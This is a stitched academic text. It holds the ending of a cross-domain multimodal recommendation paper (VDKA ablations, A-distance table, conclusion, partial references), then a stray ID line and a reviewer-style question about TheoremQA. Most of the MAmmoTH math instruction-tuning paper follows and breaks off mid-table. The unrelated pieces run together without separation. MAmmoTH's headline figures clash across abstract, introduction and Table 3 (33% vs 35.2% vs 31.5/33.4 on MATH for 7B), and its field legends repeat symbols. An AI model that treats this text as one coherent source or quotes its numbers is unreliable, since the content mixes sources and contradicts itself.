| w/o DR | 0.3344 | 0.3085 | 0.3082 | 0.2759 | 0.3186 | 0.2822 | 0.3325 | 0.3097 |
| w/o KA | 0.3368 | 0.3096 | 0.3124 | 0.2736 | 0.3153 | 0.2774 | 0.3268 | 0.3036 |

The performance on the four experimental data sets is shown in Fig. 2. We can see that as $\gamma$ increases, performance on multiple data sets trends upward at first, but further increases in $\gamma$ make essentially no difference. (b) Impact of $\lambda$: we vary $\lambda$ over [0.2, 0.4, 0.6, 0.8, 1.0]; as shown in Fig. 2, performance does not change significantly as $\lambda$ increases. (c) Impact of the embedding dimension $d$: the experimental results and analysis are provided in Appendix C.

Figure 2: Sensitivity study of parameters $\gamma$ and $\lambda$.

Table 4: Cross-domain distribution discrepancy. The results are $A$-distances computed from the cross-domain user representations.

| Model | Movie-domain & Book-domain | Food-domain & Kitchen-domain |
|----------------|----------------------------|------------------------------|
| DDTCDR | 1.3745 | 1.2491 |
| DisenCDR | 1.2529 | 1.1672 |
| DDGHM | 1.1957 | 1.1328 |
| VDKA w/o DR | 1.1151 | 1.0469 |
| VDKA w/o KA | 1.1072 | 1.0573 |
| VDKA | **1.0815** | **1.0151** |

5.5 DISTRIBUTION ANALYSIS (RQ4)

**Distribution discrepancy.** According to domain adaptation theory (Ben-David et al., 2006; Liu et al., 2022), a proxy $A$-distance can be used to measure the difference between two domains. The difference between the two domain distributions is computed by the formula $d_A(S, T) = 2(1 - \epsilon(g))$, where $\epsilon(g)$ denotes the generalization error of a linear classifier $g$ trained to distinguish the source domain $S$ from the target domain $T$; a minimal sketch is given below.
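As referenced above, a minimal sketch of the proxy $A$-distance computation used for Table 4, with a logistic-regression domain classifier on (hypothetical) user embeddings and the formula $d_A(S, T) = 2(1 - \epsilon(g))$ stated above; the train/test split and classifier choice are our assumptions.

```python
import numpy as np
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split

def proxy_a_distance(emb_src, emb_tgt):
    # label embeddings by domain and train a linear classifier g to tell them apart
    X = np.concatenate([emb_src, emb_tgt])
    y = np.concatenate([np.zeros(len(emb_src)), np.ones(len(emb_tgt))])
    Xtr, Xte, ytr, yte = train_test_split(X, y, test_size=0.5, random_state=0)
    g = LogisticRegression(max_iter=1000).fit(Xtr, ytr)
    eps = 1.0 - g.score(Xte, yte)   # generalization error of the domain classifier
    return 2.0 * (1.0 - eps)        # d_A(S, T) = 2(1 - eps(g))
```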
The user-distribution discrepancies on the two cross-domain dataset pairs are shown in Table 4. We can see that the distribution difference of our proposed VDKA is significantly lower than that of DDGHM, resulting in better cross-domain performance. When we remove the disentangled representation objective and the knowledge alignment objective, the distribution difference increases to a certain extent. This shows that our design based on disentangled knowledge transfer can indeed improve the consistency of the cross-domain distributions.

**Distribution Visualization.** To better show the difference in the distribution of the user embeddings learned by different cross-domain methods, we use t-SNE to visualize them. The visualization results are shown in Fig. 3. We can see that the difference between the embedding distributions learned separately in the two domains is quite significant. This difference in distribution makes it difficult to transfer the model's knowledge from the source domain to the target domain. The design of the DDGHM model alleviates the embedding distribution difference to a certain extent; however, a bias remains, which may cause a negative transfer problem. Our VDKA model solves the distribution-difference problem well and realizes accurate cross-domain representation learning through effective knowledge transfer. The embedding visualization shows that our method indeed improves the consistency of the cross-domain distributions, thereby providing a stronger cross-domain recommendation capability.

Figure 3: The t-SNE visualization of user embeddings on the Movie & Book cross-domain dataset.

6 CONCLUSION

In this paper, we propose a variational disentangled cross-domain knowledge alignment method for multimodal recommendation. Specifically, we propose a variational multimodal graph attention encoder that effectively learns domain-shared and domain-specific representations. Furthermore, adversarial learning is designed to realize cross-domain knowledge alignment. We conducted comprehensive experiments on multiple real-world datasets, and the experimental results show that our proposed VDKA method outperforms all other models. In the future, we will further explore effective knowledge transfer methods such as adversarial knowledge distillation.

REFERENCES

Shai Ben-David, John Blitzer, Koby Crammer, and Fernando Pereira. Analysis of representations for domain adaptation. *Advances in neural information processing systems*, 19, 2006.

Jiangxia Cao, Xixun Lin, Xin Cong, Jing Ya, Tingwen Liu, and Bin Wang. Disencdr: Learning disentangled representations for cross-domain recommendation. In *Proceedings of the 45th International ACM SIGIR Conference on Research and Development in Information Retrieval*, pp. 267–277, 2022a.

Jiangxia Cao, Jiawei Sheng, Xin Cong, Tingwen Liu, and Bin Wang. Cross-domain recommendation to cold-start users via variational information bottleneck. In *2022 IEEE 38th International Conference on Data Engineering (ICDE)*, pp. 2209–2223. IEEE, 2022b.

Jiangxia Cao, Shaoshuai Li, Bowen Yu, Xiaobo Guo, Tingwen Liu, and Bin Wang. Towards universal cross-domain recommendation. In *Proceedings of the Sixteenth ACM International Conference on Web Search and Data Mining*, pp. 78–86, 2023.

Xu Chen, Hanxiong Chen, Hongteng Xu, Yongfeng Zhang, Yixin Cao, Zheng Qin, and Hongyuan Zha.
Personalized fashion recommendation with visual explanations based on multimodal attention network: Towards visually explainable recommendation. In *Proceedings of the 42nd International ACM SIGIR Conference on Research and Development in Information Retrieval*, pp. 765–774, 2019. Yongjun Chen, Zhiwei Liu, Jia Li, Julian McAuley, and Caiming Xiong. Intent contrastive learning for sequential recommendation. In *Proceedings of the ACM Web Conference 2022*, pp. 2172–2182, 2022. Yashar Deldjoo, Markus Schedl, and Peter Knees. Content-driven music recommendation: Evolution, state of the art, and challenges. *arXiv preprint arXiv:2107.11803*, 2021. Xiaoyu Du, Zike Wu, Fuli Feng, Xiangnan He, and Jinhui Tang. Invariant representation learning for multimedia recommendation. In *Proceedings of the 30th ACM International Conference on Multimedia*, pp. 619–628, 2022. Zhiqiang Guo, Guohui Li, Jianjun Li, and Huaicong Chen. Topicvae: Topic-aware disentanglement representation learning for enhanced recommendation. In *Proceedings of the 30th ACM International Conference on Multimedia*, pp. 511–520, 2022. Tengyue Han, Pengfei Wang, Shaozhang Niu, and Chenliang Li. Modality matches modality: Pretraining modality-disentangled item representations for recommendation. In *Proceedings of the ACM Web Conference 2022*, pp. 2058–2066, 2022. Ruining He and Julian McAuley. Vbpr: visual bayesian personalized ranking from implicit feedback. In *Proceedings of the AAAI conference on artificial intelligence*, volume 30, 2016. Xiangnan He, Kuan Deng, Xiang Wang, Yan Li, Yongdong Zhang, and Meng Wang. Lightgcn: Simplifying and powering graph convolution network for recommendation. In *Proceedings of the 43rd International ACM SIGIR conference on research and development in Information Retrieval*, pp. 639–648, 2020. Guangneng Hu, Yu Zhang, and Qiang Yang. Conet: Collaborative cross networks for cross-domain recommendation. In *Proceedings of the 27th ACM international conference on information and knowledge management*, pp. 667–676, 2018. Tongwen Huang, Zhiqi Zhang, and Junlin Zhang. Fibinet: combining feature importance and bilinear feature interaction for click-through rate prediction. In *Proceedings of the 13th ACM Conference on Recommender Systems*, pp. 169–177, 2019. SeongKu Kang, Junyoung Hwang, Dongha Lee, and Hwanjo Yu. Semi-supervised learning for cross-domain recommendation to cold-start users. In *Proceedings of the 28th ACM International Conference on Information and Knowledge Management*, pp. 1563–1572, 2019.
yLClGs770I
I'm curious whether the generated annotations converted from TheoremQA can be successfully executed, because the problems there require many advanced calculations, such as integral and derivative computation.
MAmmoTH: Building Math Generalist Models through Hybrid Instruction Tuning

*Xiang Yue*, †Xingwei Qu, †Ge Zhang, °Yao Fu, §Wenhao Huang, *Huan Sun, *Yu Su, †Wenhu Chen
†University of Waterloo, *The Ohio State University, †HKUST, °University of Edinburgh, §01.AI
[email protected], [email protected]

Abstract

We introduce MAmmoTH, a series of open-source large language models (LLMs) specifically tailored for general math problem-solving. The MAmmoTH models are trained on MathInstruct, our meticulously curated instruction tuning dataset. MathInstruct is compiled from 13 math datasets with intermediate rationales, six of which have rationales newly curated by us. It presents a unique hybrid of chain-of-thought (CoT) and program-of-thought (PoT) rationales, and also ensures extensive coverage of diverse fields in math. The hybrid of CoT and PoT not only unleashes the potential of tool use but also allows different thought processes for different math problems. As a result, the MAmmoTH series substantially outperform existing open-source models on nine mathematical reasoning datasets across all scales, with an average accuracy gain between 16% and 32%. Remarkably, our MAmmoTH-7B model reaches 33% on MATH (a competition-level dataset), which exceeds the best open-source 7B model (WizardMath) by 23%, and the MAmmoTH-34B model achieves 44% accuracy on MATH, even surpassing GPT-4's CoT result. Our work underscores the importance of diverse problem coverage and the use of hybrid rationales in developing superior math generalist models.

Figure 1: The superior performance of MAmmoTH, a series of models instruction-tuned to solve a diverse set of mathematical problems using hybrid CoT and PoT rationales. MAmmoTH significantly outperforms base and SoTA models on both in-domain and out-of-domain test sets, across all scales.

* Xiang Yue and Wenhu Chen are the leading authors of the paper. They contributed equally to this project.

1 INTRODUCTION

This work focuses on mathematical reasoning, a critical capability of modern large language models (LLMs) (OpenAI [2023], Anil et al. [2023]). Despite the recent advances in this field, a noticeable gap exists between closed-source and open-source LLMs: closed-source models like GPT-4 (OpenAI [2023]), PaLM-2 (Anil et al. [2023]), and Claude 2 (Bai et al. [2022]) dominate popular mathematical reasoning benchmarks such as GSM8K (Cobbe et al. [2021]) and MATH (Hendrycks et al. [2021b]), while open-source models like Llama (Touvron et al. [2023a,b]), Falcon (Penedo et al. [2023]), and OPT (Zhang et al. [2022]) lag behind on all benchmarks by a wide margin.

Current efforts to bridge this gap are twofold: (1) Continued pre-training, like Galactica (Taylor et al. [2022]) and MINERVA (Lewkowycz et al. [2022]), which continues to train an LLM on more than 100B tokens of math-related web data. This approach improves a model's general scientific reasoning capability but incurs a high computation cost. (2) Dataset-specific fine-tuning, like rejection sampling fine-tuning (RFT) (Yuan et al. [2023]) and WizardMath (Luo et al. [2023]), which fine-tunes LLMs using supervised data specific to certain datasets. Although such approaches improve in-domain performance, they cannot generalize to a wider range of math reasoning tasks beyond their fine-tuning data. For instance, both RFT and WizardMath can increase the accuracy on GSM8K (Cobbe et al. [2021]), one of their fine-tuning datasets, by 30%+, but hurt the accuracy on out-of-domain datasets like MMLU-Math (Hendrycks et al.
[2021a]) or AQuA (Ling et al. [2017]) by up to 10%. In this paper, we aim to propose a lightweight yet generalizable math instruction-tuning approach to enhance the general (i.e., not limited to the fine-tuning tasks) mathematical reasoning capabilities of LLMs.

Existing methods (Luo et al. [2023], Yuan et al. [2023], Taylor et al. [2022]) primarily focus on Chain-of-Thought (CoT) approaches (Wei et al. [2022b], Nye et al. [2022]) that solve math problems through step-by-step natural language descriptions. This approach excels in its generality, covering most math subjects, but struggles with computation precision and with complex mathematical or algorithmic reasoning procedures (e.g., solving quadratic equation roots and calculating matrix eigenvalues). In contrast, prompts in the format of code, as in Program-of-Thought (PoT) approaches (Chen et al. [2022]) and PAL (Madaan et al. [2022], Gao et al. [2023]), utilize external tools (i.e., a Python interpreter) to greatly simplify the math-solving process. This approach advocates offloading the computation to the external Python interpreter to handle complex mathematical and algorithmic reasoning procedures (e.g., solving quadratic equations with sympy or calculating matrix eigenvalues with numpy). However, PoT falls short in more abstract reasoning scenarios, such as common-sense reasoning, formal logic, and abstract algebra, especially when no built-in APIs exist.

To leverage the strengths of both CoT and PoT approaches, we introduce a new hybrid math instruction-tuning dataset MathInstruct, which has two main characteristics: (1) broad coverage of different math fields and complexity levels, and (2) hybrid CoT & PoT rationales. MathInstruct is based on seven existing math rationale datasets and six newly-curated datasets (see details in Table 1). We use MathInstruct to fine-tune Llama (Touvron et al. [2023a,b], Rozière et al. [2023]) models of different scales ranging from 7B to 70B. The resulting MAmmoTH models (Figure 1) demonstrate unprecedented potential in serving as math generalists.

We evaluate MAmmoTH on a spectrum of datasets, including in-domain (IND) test sets: GSM8K (Cobbe et al. [2021]), MATH (Hendrycks et al. [2021b]), AQuA-RAT (Ling et al. [2017]), and NumGLUE (Mishra et al. [2022b]); and out-of-domain (OOD) test sets: SVAMP (Patel et al. [2021]), SAT (Zhong et al. [2023]), MMLU-Math (Hendrycks et al. [2021a]), Mathematics (Davies et al. [2021]), and SimulEq (Koncel-Kedziorski et al. [2016]). Compared with existing methods, our models generalize better to OOD datasets and substantially improve the performance of open-source LLMs in mathematical reasoning. Notably, on the popular competition-level MATH dataset (Hendrycks et al. [2021b]), our 7B model beats WizardMath (the open-source MATH SoTA) (Luo et al. [2023]) by 3.5x (35.2% vs 10.7%), and our 34B MAmmoTH-Coder (fine-tuned on Code Llama (Rozière et al. [2023])) can even beat the result of GPT-4 (using CoT).

We highlight our contributions from two perspectives: (1) From the data engineering perspective, we present MathInstruct, a high-quality math instruction-tuning dataset combining a variety of math problems and hybrid rationales. (2) From the modeling perspective, we investigate the impact of various data sources and input-output formats by training and evaluating over 50 different models and baselines ranging from 7B to 70B. Our models, including MAmmoTH and MAmmoTH-Coder, achieve substantial accuracy gains over existing open-source models.
| Training Dataset | Type | Annotation | # Samples | Characteristics | Fields |
|------------------|------|------------|-----------|-----------------|--------|
| GSM8K [Cobbe et al., 2021] | CoT | Human | 7K | Grade School Exam | 🟥 |
| GSM8K-RFT [Yuan et al., 2023] | CoT | Llama | 28K | Llama + Validated | 🟡 |
| AQuA-RAT [Ling et al., 2017] | CoT | Human | 90K | GRE/GMAT Exam | 🟢 |
| MATH [Hendrycks et al., 2021b] | CoT | Human | 7K | Math Competition | 🟣 |
| TheoremQA [Chen et al., 2023] | CoT | GPT-4 | 600 | GPT-4 + Validated | 🟤 |
| Camel-Math [Li et al., 2023a] | CoT | GPT-4 | 50K | GPT-4 (Unvalidated) | 🟥 |
| College-Math | CoT | GPT-4 | 1.8K | GPT-4 (Unvalidated) | 🟦 |
| GSM8K | PoT | GPT-4 | 14K | GPT-4 + Validated | 🟧 |
| AQuA-RAT | PoT | GPT-4 | 9.7K | GPT-4 + Validated | 🟨 |
| MATH | PoT | GPT-4 | 7K | GPT-4 + Validated | 🟩 |
| TheoremQA | PoT | GPT-4 | 700 | GPT-4 + Validated | 🟪 |
| MathQA [Amini et al., 2019] | PoT | Human | 25K | AQuA-RAT Subset | 🟫 |
| NumGLUE [Mishra et al., 2022a] | PoT | Human | 13K | Lila Annotated | 🟬 |
| MathInstruct | | | 260K (72% CoT, 28% PoT) | | |

Table 1: Overview of our MathInstruct. ⋆ means with NEW rationales curated by us by prompting GPT-4. We have filtered out augmented samples that have answers inconsistent with the original dataset's annotations. Different colored squares represent different fields in mathematics: 🟥 Pre-Algebra; 🟡 Inter-Algebra; 🟢 Algebra; 🟣 Probability; 🟤 NumTheory; 🟥 Calculus; 🟦 Geometry.

2 OUR APPROACH

Mathematical reasoning serves as a vital gauge for assessing the ability of LLMs to execute complex multi-hop and quantitative reasoning. This has previously been a challenging task for neural networks, which struggle to solve even basic addition and subtraction problems [Yang et al., 2023]. However, recent LLMs have made considerable advances in mathematical reasoning. Key breakthroughs have been made through CoT prompting [Wei et al., 2022b; Nye et al., 2022] and PoT prompting [Chen et al., 2022; Gao et al., 2023]. CoT prompting encourages LLMs to solve problems incrementally on a scratchpad, enhancing both accuracy and explainability in mathematical reasoning; this approach contrasts with traditional methods that generate answers directly. PoT prompting, on the other hand, formulates the intermediate reasoning process as a program, executed with an external tool like Python, to compute the answer. This method improves robustness in solving complex mathematical problems by offloading the calculations to external tools. However, most existing work [Zhou et al., 2023a] in PoT is limited to proprietary models like GPT-4 [OpenAI, 2023] and Codex [Chen et al., 2021]; the PoT potential of open-source models is yet to be seen. Our work aims at optimizing LLMs' CoT and PoT reasoning capabilities through instruction tuning.

2.1 CURATING A DIVERSE AND HYBRID INSTRUCTION TUNING DATASET

Our study aims to compile a list of high-quality and diverse math instruction-tuning datasets, standing out with two main characteristics: (1) broad coverage of different mathematical fields and complexity levels, and (2) hybrid CoT & PoT rationales.

**Broad Coverage of Different Math Fields and Complexity Levels:** We aim for a broad representation of math fields and complexity levels in our dataset. This ensures exposure to a diverse set of mathematical knowledge, fostering versatility in our models.
Based on these criteria, we narrow down our choices to a few high-quality datasets that are widely adopted and encompass different math fields and complexity levels, such as GSM8K, MATH, AQuA, Camel, and TheoremQA. Furthermore, we notice a lack of coverage of college-level math knowledge, such as abstract algebra and formal logic, in existing datasets. To rectify this, we use GPT-4 to synthesize CoT rationales for questions in TheoremQA and create question-CoT pairs through Self-Instruct [Wang et al., 2023h], utilizing a few seed exemplars found online.

**Hybrid CoT and PoT Rationales:** Contrary to previous work [Yuan et al., 2023; Luo et al., 2023; Lee et al., 2023; Wang et al., 2023g] that focuses on CoT, our dataset strategically combines both. This integration enhances the dataset's versatility, catering to varying mathematical problem-solving approaches. However, most existing datasets provide limited program rationales, leading to an imbalance between CoT and PoT rationales. To fill the gap, we utilize GPT-4 to supplement the PoT rationales for selected datasets, including MATH, AQuA, GSM8K, and TheoremQA. We further enhance the dataset quality by meticulously removing near-duplicated solutions. These GPT-4-synthesized programs are then validated by comparing their executed results with the ground truth, ensuring the high quality and reliability of the rationales. The validation subset ratio is shown in Table 6.

Following these guidelines, our instruction dataset, detailed in Table 1, encompasses 260K (instruction, response) pairs, covering a wide range of core mathematical fields (arithmetic, algebra, probability, calculus, geometry, etc.), including hybrid CoT and PoT rationales, and offering diversity in both language and difficulty levels. This attests to its high quality and unique characteristics.

### 2.2 Training Setup

We unify all the subsets in our MathInstruct to conform to the structure of an Alpaca-like instruction dataset (Taori et al., 2023). This standardization ensures that the fine-tuned models can process data consistently, regardless of the original dataset formats. We choose the open-source models Llama-2 (Touvron et al., 2023b) and Code Llama (Rozière et al., 2023) as our base models. We fine-tune these models at the 7B, 13B, 34B, and 70B scales on MathInstruct, which allows us to validate MathInstruct at multiple scales. We fine-tune all the models with the Hugging Face transformers library (Wolf et al., 2019). We use a learning rate of 2e-5 for the 7B and 13B models, and 1e-5 for the 34B and 70B models. We set the batch size to 128 and use a cosine scheduler with a 3% warm-up period for three epochs. To efficiently train the computationally intensive 34B and 70B models, we employ DeepSpeed training with the ZeRO-3 stage (Rajbhandari et al., 2020).

### 2.3 Evaluation Setup

Our hybrid training enables models to solve problems using either the CoT or PoT approach. By default, the model provides the CoT solution. To switch to the PoT approach, one can append the trigger phrase "Let's write a program to solve the problem" after the question. Our preliminary evaluation reveals that PoT generally outperforms CoT, notably on open-form questions like GSM8K and MATH, as programmable solutions are better at handling complex mathematical and algorithmic reasoning procedures. However, PoT struggles with abstract reasoning scenarios such as commonsense reasoning, formal logic, and abstract algebra, particularly in the absence of built-in APIs.
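As a concrete illustration of the validation step described in Section 2.1 (and of how PoT programs are executed in general), the sketch below runs a synthesized program in a subprocess with a timeout and compares its result against the gold answer. The convention that a program stores its result in a variable named `answer` is our assumption for illustration; the paper's exact harness may differ:

```python
import multiprocessing

def _run(program: str, out_queue):
    # Execute the synthesized program in a scratch namespace; we assume the
    # rationale leaves its result in a variable named `answer` (hypothetical
    # convention). A real harness should also sandbox this call.
    scope = {}
    try:
        exec(program, scope)
        out_queue.put(scope.get("answer"))
    except Exception:
        out_queue.put(None)

def validate_pot(program: str, ground_truth, timeout: float = 5.0) -> bool:
    """Return True iff the program executes and its answer matches the label."""
    q = multiprocessing.Queue()
    proc = multiprocessing.Process(target=_run, args=(program, q))
    proc.start()
    proc.join(timeout)
    if proc.is_alive():              # guard against non-terminating programs
        proc.terminate()
        return False
    try:
        result = q.get(timeout=1.0)
    except Exception:
        return False
    if result is None:
        return False
    try:                             # tolerate float/str formatting differences
        return abs(float(result) - float(ground_truth)) < 1e-4
    except (TypeError, ValueError):
        return str(result).strip() == str(ground_truth).strip()
```

Programs that import libraries such as sympy or numpy execute under the same check, as long as those libraries are installed in the execution environment.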
To further combine the power of both approaches, we introduce a simple hybrid decoding strategy: the model first attempts PoT prompting; if the program is not executable, we fall back to CoT prompting. This heuristic further enhances our model's overall performance (see more discussion in Section 3.4). We also report the performance of the self-consistency decoding method (Wang et al., 2023f) in Table 8.

### 3 Experiments

#### 3.1 Evaluation Datasets

We have selected diverse evaluation datasets (Table 2), encompassing a variety of in-domain and out-of-domain samples across diverse fields of mathematics, to assess the models' capabilities in general mathematical reasoning. For the in-domain datasets, we consider GSM8K (Cobbe et al., 2021), MATH (Hendrycks et al., 2021b), AQuA-RAT (Ling et al., 2017), and NumGLUE (Mishra et al., 2022b). For the out-of-domain datasets, we choose SVAMP (Patel et al., 2021), Mathematics (Davies et al., 2021), SimulEq (Koncel-Kedziorski et al., 2016), SAT-Math (Zhong et al., 2023), and MMLU-Math (Hendrycks et al., 2021a). This wide selection of evaluation datasets includes math problems from the elementary, high school, and college levels, and some of the datasets even include formal logic and commonsense reasoning. These datasets were chosen to ensure a comprehensive evaluation of the models' capabilities to generalize to unfamiliar situations and different math fields. The chosen evaluation datasets consist of both open-form and multi-choice questions.

| Eval Dataset | # Samples | In-Domain? | Answer Form | Fields |
|--------------|-----------|------------|-------------|--------|
| GSM8K [Cobbe et al., 2021] | 1319 | YES | Open-formed | ▢ |
| MATH [Hendrycks et al., 2021b] | 5000 | YES | Open-formed | ▢ □ △ ▪ ▣ |
| AQuA-RAT [Ling et al., 2017] | 254 | YES | Multi-choice | □ |
| NumGLUE [Mishra et al., 2022b] | 1042 | YES | Open-formed | ▢ |
| SVAMP [Patel et al., 2021] | 1000 | NO | Open-formed | ▢ |
| Mathematics [Davies et al., 2021] | 1000 | NO | Open-formed | ▢ □ △ ▪ ▣ |
| SimulEq [Koncel-Kedziorski et al., 2016] | 514 | NO | Open-formed | □ |
| SAT-Math [Zhong et al., 2023] | 220 | NO | Multi-choice | □ ▪ ▣ |
| MMLU-Math [Hendrycks et al., 2021a] | 974 | NO | Multi-choice | □ ▪ ▣ |

Table 2: Comprehensive overview of our evaluation datasets, featuring a variety of in-domain and out-of-domain problems across diverse fields of mathematics. Different colored squares represent different fields in mathematics: ▢ Pre-Algebra; □ Inter-Algebra; △ Algebra; ▪ Probability; ▣ NumTheory; ▪ Calculus; ▣ Geometry.

### 3.2 Baselines

We partition our baselines into the following six categories:

- **Closed-source LLMs:** We consider the closed-source LLMs GPT-4 [OpenAI, 2023], GPT-4 (Code Interpreter), PaLM-2 Unicorn [Anil et al., 2023], Claude-2 [Bai et al., 2022], and Codex [Chen et al., 2021]. GPT-4, PaLM-2, and Claude-2 use CoT prompting, while GPT-4 (Code Interpreter) and Codex use PoT prompting.
- **Llama Base:** For the base models, we consider Llama-1/2 [Touvron et al., 2023a,b] and Llama-2-Chat [Touvron et al., 2023b].
- **Coder Model:** To compare with different coder models, we choose Code-Llama [Rozière et al., 2023], CodeT5+ [Wang et al., 2023i], and CodeGen [Nijkamp et al., 2023].
- **STEM Pre-training:** We cover Galactica [Taylor et al., 2022] mainly to understand the performance of models specialized in STEM knowledge.
- **Instruction Tuning:** We include Orca-Platypus [Mukherjee et al., 2023], Vicuna-1.5 [Zheng et al., 2023b], Tulu [Wang et al., 2023g], Platypus-2 [Lee et al., 2023], and Guanaco [Dettmers et al., 2023], covering a wide spectrum of models trained with different types of datasets.
- **Dataset-Specific Tuning:** We include both RFT [Yuan et al., 2023] and WizardMath [Luo et al., 2023], which specifically tune models to adapt to the GSM8K and MATH datasets. We include them to understand their generalization.

For most baselines, we choose CoT prompting to maximize their performance, owing to their limited ability to generate programs. All the "Coder Model" baselines use PoT prompting. For GSM8K, MATH, AQuA, and NumGLUE, we evaluate both 8-shot in-context learning and zero-shot setups and report the higher score. For SVAMP, Mathematics, SimulEq, SAT, and MMLU, we use 5-shot in-context learning to maintain consistency with prior work [Wei et al., 2022b; Chen et al., 2023]. Our few-shot exemplars are mostly taken from PHP [Zheng et al., 2023a] (https://github.com/chuanyang-Zheng/Progressive-Hint). For MAmmoTH and MAmmoTH-Coder, we always evaluate under the 0-shot setting. For all models, we allow a maximum sequence length of 2048 tokens for decoding. For multiple-choice questions, if the generated answer lacks an option, we map it by re-prompting the model: "Please find the closest option to [generated answer]. The options are [options]".

### 3.3 Main Results

We report our in-domain and out-of-domain results in Table 3 and Table 4, respectively. Overall, we can see that MAmmoTH and MAmmoTH-Coder outperform the SoTA models at different scales. In general, the performance gain on OOD datasets is more significant than on IND datasets. These results show the potential of our models as mathematical generalists. On several datasets, MAmmoTH-Coder-34B and MAmmoTH-70B even surpass closed-source LLMs.

| Model | Base | Math-SFT? | GSM8K | MATH | AQuA | NumGLUE | Avg |
|------------------------|------------|-----------|-------|------|------|---------|-----|
| **Closed-source Model** | | | | | | | |
| GPT-4 | - | Unknown | 92.0† | 42.5† | 72.6† | 74.7 | 70.5 |
| GPT-4 (Code-Interpreter) | - | Unknown | 97.0† | 69.7† | - | - | - |
| PaLM-2 | - | Unknown | 80.7† | 34.3† | 64.1 | - | - |
| Claude-2 | - | Unknown | 85.2† | 32.5† | 60.9 | - | - |
| Codex (PoT) | - | No | 71.6† | 36.8† | 54.1† | - | - |
| ART (InstructGPT) | - | Unknown | 71.0 | - | 54.2 | - | - |
| **7B Parameter Model** | | | | | | | |
| Llama-1 | - | No | 10.7† | 2.9† | 22.6 | 24.7 | 15.5 |
| Llama-2 | - | No | 14.6† | 2.5† | 30.3 | 29.9 | 19.3 |
| Galactica-6.7B | GAL | GAL-Instruct | 10.2 | 2.2 | 25.6 | 25.8 | 15.9 |
| Code-Llama (PoT) | - | No | 25.2 | 13.0† | 24.0 | 26.8 | 22.2 |
| AQuA-SFT | Llama-2 | AQuA | 11.2 | 3.6 | 35.6 | 12.2 | 15.6 |
| Llama-1 RFT | Llama-1 | GSM8K | 46.5† | 5.2 | 18.8 | 21.1 | 22.9 |
| WizardMath | Llama-2 | GSM8K+MATH | 54.9† | 10.7† | 26.3 | 36.1 | 32.0 |
| **MAmmoTH** | Llama-2 | MathInstruct | 53.6 | 31.5 | 44.5 | 61.2 | 47.7 |
| **MAmmoTH-Coder** | Code-Llama | MathInstruct | 59.4 | 33.4 | 47.2 | 66.4 | 51.6 |
| Δ | | | +5 | +21 | +12 | +30 | +20 |
| **13-15B Parameter Model** | | | | | | | |
| Llama-1 | - | No | 17.8† | 3.9† | 26.0 | 24.8 | 18.1 |
| Llama-2 | - | No | 28.7† | 3.9† | 25.1 | 8.8 | 16.6 |
| Code-Llama (PoT) | - | No | 36.1 | 16.4† | 28.7 | 29.2 | 27.6 |
| CodeT5+ (PoT) | - | No | 12.5 | 2.4 | 20.5 | 19.4 | 13.7 |
| CodeGen+ (PoT) | - | No | 12.7 | 3.4 | 24.5 | 22.5 | 15.7 |
| Vicuna-1.5 | Llama-2 | No | 28.4† | 5.8 | 24.8 | 36.9 | 23.9 |
| Llama-1 RFT | Llama-1 | GSM8K | 52.1† | 5.1 | 16.1 | 24.5 | 24.4 |
| Orca-Platypus | Llama-2 | Platypus | 38.4 | 3.0 | 18.9 | 35.3 | 23.9 |
| Platypus | Llama-2 | Platypus | 25.7 | 2.5 | 33.4 | 42.3 | 25.9 |
| WizardMath | Llama-2 | GSM8K+MATH | 63.9† | 14.0† | 21.2 | 40.8 | 34.9 |
| **MAmmoTH** | Llama-2 | MathInstruct | 62.0 | 34.2 | 51.6 | 68.7 | 54.1 |
| **MAmmoTH-Coder** | Code-Llama | MathInstruct | 64.7 | 36.3 | 46.9 | 66.8 | 53.7 |
| Δ | | | +1 | +20 | +18 | +26 | +19 |
| **30-34B Parameter Model** | | | | | | | |
| Llama-1 | - | No | 35.6† | 7.1† | 33.4 | 28.4 | 26.1 |
| Code-Llama (PoT) | - | No | 44.0 | 23.1 | 25.2 | 29.3 | 30.4 |
| Llama-1 RFT | Llama-1 | GSM8K | 56.5† | 7.4† | 18.5 | 24.3 | 26.6 |
| Galactica-30B | GAL | GAL-Instruct | 41.7 | 12.7 | 28.7 | 34.7 | 29.4 |
| Platypus | Llama-1 | Platypus | 37.8 | 9.3 | 27.9 | 40.5 | 28.8 |
| Tulu | Llama-2 | Tulu | 51.0 | 10.8 | 25.5 | 43.4 | 32.6 |
| **MAmmoTH-Coder** | Code-Llama | MathInstruct | 72.7 | 43.6 | 54.7 | 71.6 | 60.7 |
| Δ | | | +16 | +21 | +21 | +28 | +28 |
| **65-70B Parameter Model** | | | | | | | |
| Llama-1 | - | No | 50.9† | 10.6† | 35.0 | 50.2 | 36.6 |
| Llama-2 | - | No | 56.8† | 13.5† | 40.9 | 50.4 | 40.4 |
| Llama-2-Chat | Llama-2 | No | 54.9 | 18.6 | 37.0 | 51.6 | 40.5 |
| Guanaco | Llama-2 | No | 59.2 | 4.1 | 45.2 | 53.5 | 40.5 |
| WizardMath | Llama-2 | GSM8K+MATH | 81.6† | 22.7† | 20.0 | 48.9 | 43.3 |
| Platypus | Llama-2 | Platypus | 70.6 | 15.6 | 51.2 | 55.4 | 48.1 |
| **MAmmoTH** | Llama-2 | MathInstruct | 76.9 | 41.8 | 65.0 | 74.4 | 64.5 |
| Δ | | | -5 | +19 | +14 | +19 | +16 |

Table 3: The table compiles all the in-domain evaluation results. Results marked as † are copied from other papers, which can be found on paperswithcode leaderboards. Math-SFT? indicates whether the model has been instruction-tuned on any math reasoning datasets. Pink numbers highlight the highest number within the corresponding scale and dataset.
Note that there does not exist a 30B+ version of Llama-2 or a 70B version of Code-Llama. From Table 3, we can observe that our main competitors on IND datasets are WizardMath (Luo et al., 2023) and Platypus (Lee et al., 2023). WizardMath's training is heavily rooted in the GSM8K and MATH datasets.

| Model | SVAMP | Mathematics | SimulEq | SAT-Math | MMLU-Math | Avg |
|----------------|-------|-------------|---------|----------|-----------|-----|
| **Closed-source Model** | | | | | | |
| GPT-4 | 97.0† | 60.8 | 83.1 | 95† | 74.9 | 82.1 |
| Codex (PoT) | 85.2† | - | - | 68† | - | - |
| **7B Parameter Model** | | | | | | |
| Llama-1 | 24.5 | 6.2 | 4.6 | 22.7 | 30.6 | 17.7 |
| Llama-2 | 34.5 | 6.0 | 5.0 | 26.8 | 29.8 | 20.4 |
| Code-Llama (PoT) | 49.4 | 21.7 | 3.5 | 28.6 | 26.9 | 26.0 |
| Llama-1 RFT | 21.1 | 5.1 | 11.0 | 12.5 | 21.7 | 14.3 |
| Galactica-6.7B | 25.6 | 4.6 | 4.2 | 17.5 | 28.0 | 16.0 |
